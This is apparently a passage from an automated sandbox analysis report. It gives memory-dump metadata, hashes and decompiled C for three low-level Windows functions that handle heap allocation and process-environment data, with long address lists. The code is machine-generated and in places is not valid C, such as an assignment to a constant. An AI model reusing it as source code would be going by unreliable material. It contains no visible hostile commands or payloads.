                            0x00000000
                            0x012fd831
                            0x00000000
                            0x012fd800
                            0x0134b47f
                            0x0134b485
                            0x00000000
                            0x0134b485
                            0x012fd665
                            0x012fd652
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cf2c4f692f65e1979512bb4296161abed3514bd5479bdc99879818bd68442309
                            • Instruction ID: 6d35a62835eb9b32716265b79b03b339e3a0d668714ecb9652888029c8ff3fce
                            • Opcode Fuzzy Hash: cf2c4f692f65e1979512bb4296161abed3514bd5479bdc99879818bd68442309
                            • Instruction Fuzzy Hash: 17E1DF31A1135ACFEB35CF69C880BA9F7B6BF45308F0401ADDB09AB295D774A981CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 012F849B, Relevance: .3, Instructions: 290COMMON
                            Download Yara Rule
                            C-Code - Quality: 92%
                            			E012F849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x13bf9c0);
				E0133D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x13d7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E012FCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01302280( *[fs:0x30], 0x13d8550);
						_t139 =  *0x13d7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0131F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E012FFFB0(_t193, _t235, 0x13d8550);
								L5:
								return E0133D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E012E1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x13d7b9c; // 0x0
							_t235 = L01304620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x13d7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0131A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E012FFFB0(_t193, _t235, 0x13d8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L013077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L013077F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x13d7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x13d7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E013237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x13d7b9c; // 0x0
									_t214 = L01304620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E013237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x13d7b10 =  *0x13d7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x13d7b04 =  *0x13d7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L013077F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L013077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x13d7b08 =  *0x13d7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E013257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0132F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L013077F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0131A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L013077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E013296C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                            0x012f849b
                            0x012f849b
                            0x012f849b
                            0x012f849b
                            0x012f849d
                            0x012f84a2
                            0x012f84a7
                            0x012f84b1
                            0x012f84d8
                            0x00000000
                            0x012f84b3
                            0x012f84c4
                            0x012f84c9
                            0x012f84cd
                            0x012f84cf
                            0x012f84cf
                            0x012f84d6
                            0x012f84e6
                            0x012f84e9
                            0x012f84ec
                            0x012f84ef
                            0x012f84f2
                            0x012f84f4
                            0x012f84fc
                            0x012f8501
                            0x012f8506
                            0x012f8509
                            0x012f86e0
                            0x012f86e5
                            0x012f86e8
                            0x012f86ed
                            0x012f86f0
                            0x012f86f2
                            0x01349afd
                            0x01349b02
                            0x012f84da
                            0x012f84df
                            0x012f84df
                            0x012f86fa
                            0x012f86fd
                            0x012f86fe
                            0x012f8701
                            0x012f8706
                            0x012f8709
                            0x012f870b
                            0x00000000
                            0x00000000
                            0x012f8711
                            0x012f8725
                            0x012f8727
                            0x012f872a
                            0x012f872c
                            0x01349af0
                            0x01349af5
                            0x012f8732
                            0x012f8732
                            0x012f8732
                            0x012f8735
                            0x012f8737
                            0x012f8515
                            0x012f8515
                            0x012f8518
                            0x012f851d
                            0x012f8523
                            0x012f8527
                            0x012f852b
                            0x012f8537
                            0x012f8539
                            0x012f853c
                            0x012f853e
                            0x012f868c
                            0x012f8691
                            0x012f8699
                            0x012f869b
                            0x012f8744
                            0x012f8748
                            0x012f86a1
                            0x012f86a1
                            0x012f86a1
                            0x012f86a4
                            0x012f86a8
                            0x01349bdf
                            0x01349bdf
                            0x012f86ae
                            0x012f86b0
                            0x00000000
                            0x012f86b6
                            0x00000000
                            0x01349be9
                            0x012f86b0
                            0x012f8544
                            0x012f854a
                            0x012f854d
                            0x012f8551
                            0x012f876e
                            0x012f8778
                            0x012f877b
                            0x012f8780
                            0x012f8557
                            0x012f8557
                            0x012f855d
                            0x012f855d
                            0x012f856b
                            0x012f856e
                            0x012f8570
                            0x012f8573
                            0x012f8576
                            0x012f8576
                            0x012f8579
                            0x012f857b
                            0x00000000
                            0x00000000
                            0x012f8581
                            0x012f85a0
                            0x012f85a2
                            0x012f85a5
                            0x012f85a7
                            0x01349b1b
                            0x01349b1b
                            0x012f862e
                            0x012f862e
                            0x012f8631
                            0x012f8631
                            0x012f8634
                            0x012f8636
                            0x012f8669
                            0x012f8669
                            0x012f866b
                            0x01349bbf
                            0x01349bc4
                            0x01349bc8
                            0x01349bce
                            0x01349bce
                            0x012f8671
                            0x012f8671
                            0x012f8674
                            0x012f8676
                            0x01349bae
                            0x01349bae
                            0x012f8676
                            0x012f867c
                            0x012f867e
                            0x012f8688
                            0x012f8688
                            0x00000000
                            0x012f867e
                            0x012f8638
                            0x012f8638
                            0x012f863b
                            0x012f863e
                            0x012f863f
                            0x012f8642
                            0x012f8645
                            0x012f8648
                            0x012f864d
                            0x01349b69
                            0x01349b6e
                            0x01349b7b
                            0x01349b81
                            0x01349b85
                            0x01349b89
                            0x01349ba7
                            0x01349b8b
                            0x01349b91
                            0x01349b9a
                            0x01349b9f
                            0x01349b9f
                            0x012f8788
                            0x012f878d
                            0x012f8763
                            0x012f8763
                            0x012f8766
                            0x00000000
                            0x012f8766
                            0x01349b70
                            0x00000000
                            0x01349b70
                            0x012f8656
                            0x012f865a
                            0x012f865c
                            0x012f8752
                            0x012f8756
                            0x00000000
                            0x00000000
                            0x012f875e
                            0x00000000
                            0x012f875e
                            0x012f8662
                            0x012f8662
                            0x012f8662
                            0x012f8666
                            0x00000000
                            0x012f8666
                            0x012f85b7
                            0x012f85b9
                            0x012f85bc
                            0x012f85bf
                            0x012f85cc
                            0x012f85d1
                            0x012f85d4
                            0x012f85db
                            0x012f85de
                            0x012f85e0
                            0x01349b5f
                            0x00000000
                            0x01349b5f
                            0x012f85e6
                            0x012f85ea
                            0x012f86c3
                            0x012f86c5
                            0x012f86c8
                            0x012f86ca
                            0x01349b16
                            0x00000000
                            0x01349b16
                            0x012f86d6
                            0x012f85f6
                            0x012f85f6
                            0x012f85f9
                            0x012f8602
                            0x012f8606
                            0x012f860a
                            0x012f860b
                            0x012f860e
                            0x012f8611
                            0x00000000
                            0x012f8611
                            0x012f85f3
                            0x00000000
                            0x012f85f3
                            0x012f8619
                            0x012f861e
                            0x012f861e
                            0x012f8621
                            0x012f8622
                            0x012f8623
                            0x012f8625
                            0x012f862c
                            0x00000000
                            0x012f873d
                            0x00000000
                            0x012f873d
                            0x012f8737
                            0x012f850f
                            0x012f8512
                            0x00000000
                            0x012f8512
                            0x00000000
                            0x012f84d6

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4346b2259d2d8991abf63d17d7ba627ed4a7387b4cf7d30f3e3fc8d7470081e4
                            • Instruction ID: 96f58b9e2a3502f10973446483786486952d1c3a98e8b1ab09ce377f01e3644e
                            • Opcode Fuzzy Hash: 4346b2259d2d8991abf63d17d7ba627ed4a7387b4cf7d30f3e3fc8d7470081e4
                            • Instruction Fuzzy Hash: 2DB14A74E1020ADFDB29DFA9C984AAEFBB9FF48308F10412DE615AB345D770A945CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131513A, Relevance: .3, Instructions: 258COMMON
                            Download Yara Rule
                            C-Code - Quality: 67%
                            			E0131513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x13dd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0132D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01302280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L013077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01304620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0132F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E012FFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x13db1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0132B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                            0x01315142
                            0x0131514c
                            0x01315150
                            0x01315157
                            0x01315159
                            0x0131515e
                            0x01315165
                            0x01315169
                            0x0131516c
                            0x01315172
                            0x01315176
                            0x0131517a
                            0x0131517a
                            0x0131517a
                            0x0131517f
                            0x01356d8b
                            0x01356d8e
                            0x01356d91
                            0x01356d95
                            0x01356d98
                            0x01356d9c
                            0x01356da0
                            0x01356da3
                            0x01356da7
                            0x01356e26
                            0x01356e26
                            0x01356e2a
                            0x013151f9
                            0x013151f9
                            0x013151fe
                            0x01356e33
                            0x01356e33
                            0x01356e39
                            0x01356e3d
                            0x01356e46
                            0x01356e50
                            0x00000000
                            0x00000000
                            0x01356e52
                            0x01356e53
                            0x01356e56
                            0x01356e5d
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01356e5f
                            0x01356e67
                            0x01356e77
                            0x01356e7f
                            0x01356e80
                            0x01356e88
                            0x01356e90
                            0x01356e9f
                            0x01356ea5
                            0x01356ea9
                            0x01356eb1
                            0x01356ebf
                            0x00000000
                            0x00000000
                            0x01356ecf
                            0x01356ed3
                            0x00000000
                            0x00000000
                            0x01356edb
                            0x01356ede
                            0x01356ee1
                            0x01356ee8
                            0x01356eeb
                            0x01356eed
                            0x01356ef0
                            0x01356ef4
                            0x01356ef8
                            0x01356efc
                            0x00000000
                            0x00000000
                            0x01356f0d
                            0x01356f11
                            0x01356f32
                            0x01356f37
                            0x01356f3b
                            0x01356f3e
                            0x01356f41
                            0x01356f46
                            0x00000000
                            0x00000000
                            0x01356f4c
                            0x01356f50
                            0x01356f50
                            0x01356f54
                            0x01356f62
                            0x01356f65
                            0x01356f6d
                            0x01356f7b
                            0x01356f7b
                            0x01356f93
                            0x01356f98
                            0x01356fa0
                            0x01356fa6
                            0x01356fb3
                            0x01356fb6
                            0x01356fbf
                            0x01356fc1
                            0x01356fd5
                            0x01356fda
                            0x01356fda
                            0x01356fdd
                            0x01356fe2
                            0x01356fe7
                            0x01356feb
                            0x01356fef
                            0x01356ff3
                            0x0131520c
                            0x0131520c
                            0x0131520f
                            0x01315215
                            0x01315234
                            0x0131523a
                            0x0131523a
                            0x01315244
                            0x01315245
                            0x01315246
                            0x01315251
                            0x01315251
                            0x01356f13
                            0x01356f17
                            0x01356f17
                            0x01356f18
                            0x01356f1b
                            0x01356f1f
                            0x01356f23
                            0x00000000
                            0x01356f28
                            0x01315204
                            0x01315204
                            0x01315208
                            0x00000000
                            0x01315208
                            0x01315185
                            0x01315188
                            0x0131518a
                            0x0131518e
                            0x01315195
                            0x01356db1
                            0x01356db5
                            0x01356db9
                            0x0131519b
                            0x0131519b
                            0x0131519e
                            0x013151a7
                            0x013151a9
                            0x013151a9
                            0x013151b5
                            0x013151b8
                            0x013151bb
                            0x013151be
                            0x013151c1
                            0x013151c5
                            0x013151c9
                            0x013151cd
                            0x013151cd
                            0x013151d8
                            0x013151dc
                            0x013151e0
                            0x01356dcc
                            0x01356dd0
                            0x01356dd5
                            0x01356ddd
                            0x01356de1
                            0x01356de1
                            0x01356de5
                            0x01356deb
                            0x01356df1
                            0x01356df7
                            0x01356dfd
                            0x01356e01
                            0x01356e05
                            0x01356e09
                            0x01356e0d
                            0x01356e11
                            0x01356e11
                            0x013151eb
                            0x01356e1a
                            0x01356e1f
                            0x01356e21
                            0x01356e23
                            0x00000000
                            0x013151f1
                            0x013151f1
                            0x00000000
                            0x013151f1

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1daa0d10d6fb511daeb8ba247a62725ed5bde0221f7a08fd5c37ea9c737bb023
                            • Instruction ID: 17ebf17d2d0ff1f0194b3f8155e2439772f6d9142b85b2958b4c3b2f1cec2ef7
                            • Opcode Fuzzy Hash: 1daa0d10d6fb511daeb8ba247a62725ed5bde0221f7a08fd5c37ea9c737bb023
                            • Instruction Fuzzy Hash: C3C154B55093818FD355CF28C580A5AFBF1BF89708F544A6EF9998B352D730E845CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 013103E2, Relevance: .3, Instructions: 254COMMON
                            Download Yara Rule
                            C-Code - Quality: 74%
                            			E013103E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x13dd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E01310548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0132B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E012FB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x13d7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E01307D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E01307D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E01367016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E01329830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
